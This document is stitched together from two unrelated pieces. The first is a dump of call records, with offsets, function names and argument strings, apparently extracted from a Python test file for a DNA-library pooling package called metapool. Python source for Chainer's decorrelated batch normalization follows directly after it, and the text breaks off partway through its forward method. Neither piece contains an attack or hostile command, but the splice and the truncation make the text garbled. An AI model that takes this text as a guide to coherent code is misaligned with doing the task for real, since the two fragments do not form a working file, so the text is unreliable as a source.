bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((14917, 14951), 'numpy.array', 'np.array', (["['A1', 'A2', 'B1', 'B2']"], {}), "(['A1', 'A2', 'B1', 'B2'])\n", (14925, 14951), True, 'import numpy as np\n'), ((14976, 15020), 'numpy.array', 'np.array', (["['sam1', 'sam2', 'blank1', 'sam3']"], {}), "(['sam1', 'sam2', 'blank1', 'sam3'])\n", (14984, 15020), True, 'import numpy as np\n'), ((15040, 15928), 'pandas.DataFrame', 'pd.DataFrame', (["{'i5 name': {(0): 'iTru5_01_A', (1): 'iTru5_01_B', (2): 'iTru5_01_C', (3):\n 'iTru5_01_D'}, 'i5 plate': {(0): 'iTru5_plate', (1): 'iTru5_plate', (2):\n 'iTru5_plate', 
(3): 'iTru5_plate'}, 'i5 sequence': {(0): 'ACCGACAA', (1\n ): 'AGTGGCAA', (2): 'CACAGACT', (3): 'CGACACTT'}, 'i5 well': {(0): 'A1',\n (1): 'B1', (2): 'C1', (3): 'D1'}, 'i7 name': {(0): 'iTru7_101_01', (1):\n 'iTru7_101_02', (2): 'iTru7_101_03', (3): 'iTru7_101_04'}, 'i7 plate':\n {(0): 'iTru7_plate', (1): 'iTru7_plate', (2): 'iTru7_plate', (3):\n 'iTru7_plate'}, 'i7 sequence': {(0): 'ACGTTACC', (1): 'CTGTGTTG', (2):\n 'TGAGGTGT', (3): 'GATCCATG'}, 'i7 well': {(0): 'A1', (1): 'A2', (2):\n 'A3', (3): 'A4'}, 'index combo': {(0): 0, (1): 1, (2): 2, (3): 3},\n 'index combo seq': {(0): 'ACCGACAAACGTTACC', (1): 'AGTGGCAACTGTGTTG', (\n 2): 'CACAGACTTGAGGTGT', (3): 'CGACACTTGATCCATG'}}"], {}), "({'i5 name': {(0): 'iTru5_01_A', (1): 'iTru5_01_B', (2):\n 'iTru5_01_C', (3): 'iTru5_01_D'}, 'i5 plate': {(0): 'iTru5_plate', (1):\n 'iTru5_plate', (2): 'iTru5_plate', (3): 'iTru5_plate'}, 'i5 sequence':\n {(0): 'ACCGACAA', (1): 'AGTGGCAA', (2): 'CACAGACT', (3): 'CGACACTT'},\n 'i5 well': {(0): 'A1', (1): 'B1', (2): 'C1', (3): 'D1'}, 'i7 name': {(0\n ): 'iTru7_101_01', (1): 'iTru7_101_02', (2): 'iTru7_101_03', (3):\n 'iTru7_101_04'}, 'i7 plate': {(0): 'iTru7_plate', (1): 'iTru7_plate', (\n 2): 'iTru7_plate', (3): 'iTru7_plate'}, 'i7 sequence': {(0): 'ACGTTACC',\n (1): 'CTGTGTTG', (2): 'TGAGGTGT', (3): 'GATCCATG'}, 'i7 well': {(0):\n 'A1', (1): 'A2', (2): 'A3', (3): 'A4'}, 'index combo': {(0): 0, (1): 1,\n (2): 2, (3): 3}, 'index combo seq': {(0): 'ACCGACAAACGTTACC', (1):\n 'AGTGGCAACTGTGTTG', (2): 'CACAGACTTGAGGTGT', (3): 'CGACACTTGATCCATG'}})\n", (15052, 15928), True, 'import pandas as pd\n'), ((16989, 17047), 'metapool.metapool.format_index_picklist', 'format_index_picklist', (['sample_names', 'sample_wells', 'indices'], {}), '(sample_names, sample_wells, indices)\n', (17010, 17047), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, 
compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((17177, 17217), 'metapool.metapool.compute_qpcr_concentration', 'compute_qpcr_concentration', (['self.cp_vals'], {}), '(self.cp_vals)\n', (17203, 17217), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((17256, 17285), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['obs', 'exp'], {}), '(obs, exp)\n', (17275, 17285), True, 'import numpy.testing as npt\n'), ((17384, 17452), 'metapool.metapool.compute_shotgun_pooling_values_eqvol', 'compute_shotgun_pooling_values_eqvol', (['self.qpcr_conc'], {'total_vol': '(60.0)'}), '(self.qpcr_conc, total_vol=60.0)\n', (17420, 17452), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((17570, 17623), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['obs_sample_vols', 'exp_sample_vols'], {}), '(obs_sample_vols, exp_sample_vols)\n', 
(17589, 17623), True, 'import numpy.testing as npt\n'), ((17729, 17795), 'metapool.metapool.compute_shotgun_pooling_values_eqvol', 'compute_shotgun_pooling_values_eqvol', (['self.qpcr_conc'], {'total_vol': '(60)'}), '(self.qpcr_conc, total_vol=60)\n', (17765, 17795), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((17913, 17966), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['obs_sample_vols', 'exp_sample_vols'], {}), '(obs_sample_vols, exp_sample_vols)\n', (17932, 17966), True, 'import numpy.testing as npt\n'), ((18047, 18085), 'numpy.array', 'np.array', (['[[1, 12, 400], [200, 40, 1]]'], {}), '([[1, 12, 400], [200, 40, 1]])\n', (18055, 18085), True, 'import numpy as np\n'), ((18139, 18186), 'numpy.array', 'np.array', (['[[0, 50000, 6250], [12500, 50000, 0]]'], {}), '([[0, 50000, 6250], [12500, 50000, 0]])\n', (18147, 18186), True, 'import numpy as np\n'), ((18236, 18285), 'metapool.metapool.compute_shotgun_pooling_values_qpcr', 'compute_shotgun_pooling_values_qpcr', (['sample_concs'], {}), '(sample_concs)\n', (18271, 18285), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((18295, 
18334), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['exp_vols', 'obs_vols'], {}), '(exp_vols, obs_vols)\n', (18314, 18334), True, 'import numpy.testing as npt\n'), ((18422, 18460), 'numpy.array', 'np.array', (['[[1, 12, 400], [200, 40, 1]]'], {}), '([[1, 12, 400], [200, 40, 1]])\n', (18430, 18460), True, 'import numpy as np\n'), ((18514, 18600), 'numpy.array', 'np.array', (['[[100, 100, 4166.6666666666], [8333.33333333333, 41666.666666666, 100]]'], {}), '([[100, 100, 4166.6666666666], [8333.33333333333, 41666.666666666, \n 100]])\n', (18522, 18600), True, 'import numpy as np\n'), ((18645, 18701), 'metapool.metapool.compute_shotgun_pooling_values_qpcr_minvol', 'compute_shotgun_pooling_values_qpcr_minvol', (['sample_concs'], {}), '(sample_concs)\n', (18687, 18701), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((18711, 18750), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['exp_vols', 'obs_vols'], {}), '(exp_vols, obs_vols)\n', (18730, 18750), True, 'import numpy.testing as npt\n'), ((18821, 18889), 'metapool.metapool.compute_shotgun_pooling_values_eqvol', 'compute_shotgun_pooling_values_eqvol', (['self.qpcr_conc'], {'total_vol': '(60.0)'}), '(self.qpcr_conc, total_vol=60.0)\n', (18857, 18889), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, 
format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((18942, 18997), 'metapool.metapool.estimate_pool_conc_vol', 'estimate_pool_conc_vol', (['obs_sample_vols', 'self.qpcr_conc'], {}), '(obs_sample_vols, self.qpcr_conc)\n', (18964, 18997), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((19090, 19143), 'numpy.testing.assert_almost_equal', 'npt.assert_almost_equal', (['obs_pool_conc', 'exp_pool_conc'], {}), '(obs_pool_conc, exp_pool_conc)\n', (19113, 19143), True, 'import numpy.testing as npt\n'), ((19152, 19203), 'numpy.testing.assert_almost_equal', 'npt.assert_almost_equal', (['obs_pool_vol', 'exp_pool_vol'], {}), '(obs_pool_vol, exp_pool_vol)\n', (19175, 19203), True, 'import numpy.testing as npt\n'), ((19276, 19322), 'numpy.array', 'np.array', (['[[10.0, 10.0, 5.0, 5.0, 10.0, 10.0]]'], {}), '([[10.0, 10.0, 5.0, 5.0, 10.0, 10.0]])\n', (19284, 19322), True, 'import numpy as np\n'), ((19999, 20092), 'metapool.metapool.format_pooling_echo_pick_list', 'format_pooling_echo_pick_list', (['vol_sample'], {'max_vol_per_well': '(26)', 'dest_plate_shape': '[16, 24]'}), '(vol_sample, max_vol_per_well=26,\n dest_plate_shape=[16, 24])\n', (20028, 20092), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, 
compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((20332, 20381), 'numpy.array', 'np.array', (['[[10.0, 10.0, np.nan, 5.0, 10.0, 10.0]]'], {}), '([[10.0, 10.0, np.nan, 5.0, 10.0, 10.0]])\n', (20340, 20381), True, 'import numpy as np\n'), ((21057, 21150), 'metapool.metapool.format_pooling_echo_pick_list', 'format_pooling_echo_pick_list', (['vol_sample'], {'max_vol_per_well': '(26)', 'dest_plate_shape': '[16, 24]'}), '(vol_sample, max_vol_per_well=26,\n dest_plate_shape=[16, 24])\n', (21086, 21150), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((21375, 21448), 'pandas.DataFrame', 'pd.DataFrame', (["{'Cp': [12, 0, 5, np.nan], 'Pos': ['A1', 'A2', 'A3', 'A4']}"], {}), "({'Cp': [12, 0, 5, np.nan], 'Pos': ['A1', 'A2', 'A3', 'A4']})\n", (21387, 21448), True, 'import pandas as pd\n'), ((21513, 21549), 'numpy.array', 'np.array', (['[[12.0, 0.0, 5.0, np.nan]]'], {}), '([[12.0, 0.0, 5.0, np.nan]])\n', (21521, 21549), True, 'import numpy as np\n'), ((21703, 21822), 'pandas.DataFrame', 'pd.DataFrame', (["{'Cp': [12, 0, 1, np.nan, 12, 0, 5, np.nan], 'Pos': ['A1', 'A2', 'A3', 'A4',\n 'B1', 'B2', 'B3', 'B4']}"], {}), "({'Cp': [12, 0, 1, np.nan, 12, 0, 5, np.nan], 'Pos': ['A1',\n 'A2', 'A3', 'A4', 'B1', 'B2', 'B3', 'B4']})\n", (21715, 21822), True, 'import pandas as pd\n'), ((21981, 22043), 'numpy.array', 'np.array', (['[[12.0, 0.0, 1.0, np.nan], 
[12.0, 0.0, 5.0, np.nan]]'], {}), '([[12.0, 0.0, 1.0, np.nan], [12.0, 0.0, 5.0, np.nan]])\n', (21989, 22043), True, 'import numpy as np\n'), ((24834, 24905), 'metapool.metapool.combine_dfs', 'combine_dfs', (['test_qpcr_df', 'test_dna_picklist_df', 'test_index_picklist_df'], {}), '(test_qpcr_df, test_dna_picklist_df, test_index_picklist_df)\n', (24845, 24905), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((24928, 24995), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['combined_df', 'exp_df'], {'check_like': '(True)'}), '(combined_df, exp_df, check_like=True)\n', (24957, 24995), True, 'import pandas as pd\n'), ((26373, 26410), 'metapool.metapool.add_dna_conc', 'add_dna_conc', (['test_in_df', 'test_dna_df'], {}), '(test_in_df, test_dna_df)\n', (26385, 26410), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((26420, 26482), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['obs_df', 'exp_df'], {'check_like': '(True)'}), '(obs_df, exp_df, check_like=True)\n', (26449, 26482), True, 'import pandas as pd\n'), ((26545, 26586), 
'metapool.metapool.compute_pico_concentration', 'compute_pico_concentration', (['self.dna_vals'], {}), '(self.dna_vals)\n', (26571, 26586), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((26625, 26654), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['obs', 'exp'], {}), '(obs, exp)\n', (26644, 26654), True, 'import numpy.testing as npt\n'), ((27094, 27134), 'metapool.metapool.sequencer_i5_index', 'sequencer_i5_index', (['"""HiSeq4000"""', 'indices'], {}), "('HiSeq4000', indices)\n", (27112, 27134), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((27158, 27198), 'metapool.metapool.sequencer_i5_index', 'sequencer_i5_index', (['"""HiSeq2500"""', 'indices'], {}), "('HiSeq2500', indices)\n", (27176, 27198), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, 
compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((27221, 27259), 'metapool.metapool.sequencer_i5_index', 'sequencer_i5_index', (['"""NextSeq"""', 'indices'], {}), "('NextSeq', indices)\n", (27239, 27259), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((27912, 27950), 'metapool.metapool.reformat_interleaved_to_columns', 'reformat_interleaved_to_columns', (['wells'], {}), '(wells)\n', (27943, 27950), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((27960, 27999), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['exp', 'obs'], {}), '(exp, obs)\n', (27989, 27999), True, 'import numpy as np\n'), ((4996, 5027), 'metapool.metapool.read_plate_map_csv', 'read_plate_map_csv', (['plate_map_f'], {}), '(plate_map_f)\n', (5014, 5027), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, 
estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((5507, 5538), 'metapool.metapool.read_plate_map_csv', 'read_plate_map_csv', (['plate_map_f'], {}), '(plate_map_f)\n', (5525, 5538), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((7291, 7316), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (7306, 7316), False, 'import os\n'), ((7770, 7818), 'metapool.metapool.read_pico_csv', 'read_pico_csv', (['fp_spectramax'], {'plate_reader': '"""foo"""'}), "(fp_spectramax, plate_reader='foo')\n", (7783, 7818), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((17529, 17545), 'numpy.zeros', 'np.zeros', (['[3, 4]'], {}), '([3, 4])\n', (17537, 17545), True, 'import numpy as np\n'), ((17872, 17888), 'numpy.zeros', 'np.zeros', (['[3, 4]'], {}), '([3, 4])\n', (17880, 17888), True, 'import numpy as np\n'), ((24502, 24533), 'io.StringIO', 'StringIO', (['test_index_picklist_f'], {}), '(test_index_picklist_f)\n', (24510, 24533), False, 'from 
io import StringIO\n'), ((24611, 24640), 'io.StringIO', 'StringIO', (['test_dna_picklist_f'], {}), '(test_dna_picklist_f)\n', (24619, 24640), False, 'from io import StringIO\n'), ((24697, 24718), 'io.StringIO', 'StringIO', (['test_qpcr_f'], {}), '(test_qpcr_f)\n', (24705, 24718), False, 'from io import StringIO\n'), ((24770, 24789), 'io.StringIO', 'StringIO', (['exp_out_f'], {}), '(exp_out_f)\n', (24778, 24789), False, 'from io import StringIO\n'), ((26159, 26181), 'io.StringIO', 'StringIO', (['test_exp_out'], {}), '(test_exp_out)\n', (26167, 26181), False, 'from io import StringIO\n'), ((26236, 26259), 'io.StringIO', 'StringIO', (['test_combined'], {}), '(test_combined)\n', (26244, 26259), False, 'from io import StringIO\n'), ((26315, 26333), 'io.StringIO', 'StringIO', (['test_dna'], {}), '(test_dna)\n', (26323, 26333), False, 'from io import StringIO\n'), ((26726, 26750), 'metapool.metapool.bcl_scrub_name', 'bcl_scrub_name', (['"""test.1"""'], {}), "('test.1')\n", (26740, 26750), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((26787, 26811), 'metapool.metapool.bcl_scrub_name', 'bcl_scrub_name', (['"""test-1"""'], {}), "('test-1')\n", (26801, 26811), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, 
add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((26848, 26872), 'metapool.metapool.bcl_scrub_name', 'bcl_scrub_name', (['"""test_1"""'], {}), "('test_1')\n", (26862, 26872), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((26923, 26934), 'metapool.metapool.rc', 'rc', (['"""AGCCT"""'], {}), "('AGCCT')\n", (26925, 26934), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((27470, 27504), 'metapool.metapool.sequencer_i5_index', 'sequencer_i5_index', (['"""foo"""', 'indices'], {}), "('foo', indices)\n", (27488, 27504), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((21586, 21632), 
'metapool.metapool.make_2D_array', 'make_2D_array', (['example_qpcr_df'], {'rows': '(1)', 'cols': '(4)'}), '(example_qpcr_df, rows=1, cols=4)\n', (21599, 21632), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((22114, 22161), 'metapool.metapool.make_2D_array', 'make_2D_array', (['example2_qpcr_df'], {'rows': '(2)', 'cols': '(4)'}), '(example2_qpcr_df, rows=2, cols=4)\n', (22127, 22161), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n')] |
import numpy
from chainer import backend
from chainer import function_node
from chainer.utils import argument
from chainer.utils import type_check
# {numpy: True, cupy: False}
_xp_supports_batch_eigh = {}
# routines for batched matrices
def _eigh(a, xp):
    """Batched symmetric eigendecomposition with a per-module fallback.

    Probes once per array module whether ``xp.linalg.eigh`` accepts stacked
    (batched) input and caches the answer in ``_xp_supports_batch_eigh``.
    When batched input is unsupported, each matrix is decomposed separately
    and the results are stacked.
    """
    supported = _xp_supports_batch_eigh.get(xp)
    if supported is None:
        try:
            xp.linalg.eigh(xp.ones((2, 2, 2), xp.float32))
        except ValueError:
            supported = False
        else:
            supported = True
        _xp_supports_batch_eigh[xp] = supported
    if supported:
        return xp.linalg.eigh(a)
    # Fallback: decompose one matrix at a time and stack the pieces.
    eigenvalues = []
    eigenvectors = []
    for matrix in a:
        w, v = xp.linalg.eigh(matrix)
        eigenvalues.append(w)
        eigenvectors.append(v)
    return xp.stack(eigenvalues), xp.stack(eigenvectors)
def _matmul(a, b, xp):
if hasattr(xp, 'matmul'): # numpy.matmul is supported from version 1.10.0
return xp.matmul(a, b)
else:
return xp.einsum('bij,bjk->bik', a, b)
def _diag(a, xp):
s0, s1 = a.shape
ret = xp.zeros((s0, s1, s1), a.dtype)
arange_s1 = numpy.arange(s1)
ret[:, arange_s1, arange_s1] = a
return ret
def _calc_axis_and_m(x_shape, batch_size):
m = batch_size
spatial_ndim = len(x_shape) - 2
spatial_axis = tuple(range(2, 2 + spatial_ndim))
for i in spatial_axis:
m *= x_shape[i]
return spatial_axis, m
class DecorrelatedBatchNormalization(function_node.FunctionNode):

    """Forward computation of decorrelated (ZCA-whitening) batch normalization.

    The channel axis is split into ``groups`` groups of ``C = channels //
    groups`` channels each; every group is centered and whitened using the
    eigendecomposition of its covariance matrix, estimated over the batch
    and spatial axes.  Running statistics, when supplied, are updated in
    place with an exponential moving average.
    See https://arxiv.org/abs/1804.08450.
    """

    def __init__(self, groups=16, eps=2e-5, mean=None, projection=None,
                 decay=0.9):
        # Number of channel groups that are whitened independently.
        self.groups = groups
        # Running statistics; updated in place during forward when not None.
        self.running_mean = mean
        self.running_projection = projection
        # Regularizer added to the covariance diagonal for stability.
        self.eps = eps
        # Moving-average factor for the running statistics.
        self.decay = decay
        self.axis = None

    def check_type_forward(self, in_types):
        # Exactly one floating-point input whose channel count (axis 1) is
        # divisible by the number of groups.
        type_check.expect(in_types.size() == 1)
        x_type = in_types[0]
        type_check.expect(
            x_type.dtype.kind == 'f',
            x_type.shape[1] % self.groups == 0,
        )
        type_check.expect(
            x_type.ndim >= 2,
        )

    def forward(self, inputs):
        self.retain_inputs(())
        x = inputs[0]
        xp = backend.get_array_module(x)
        x_shape = x.shape
        b, c = x_shape[:2]
        g = self.groups
        C = c // g
        spatial_axis, m = _calc_axis_and_m(x_shape, b)
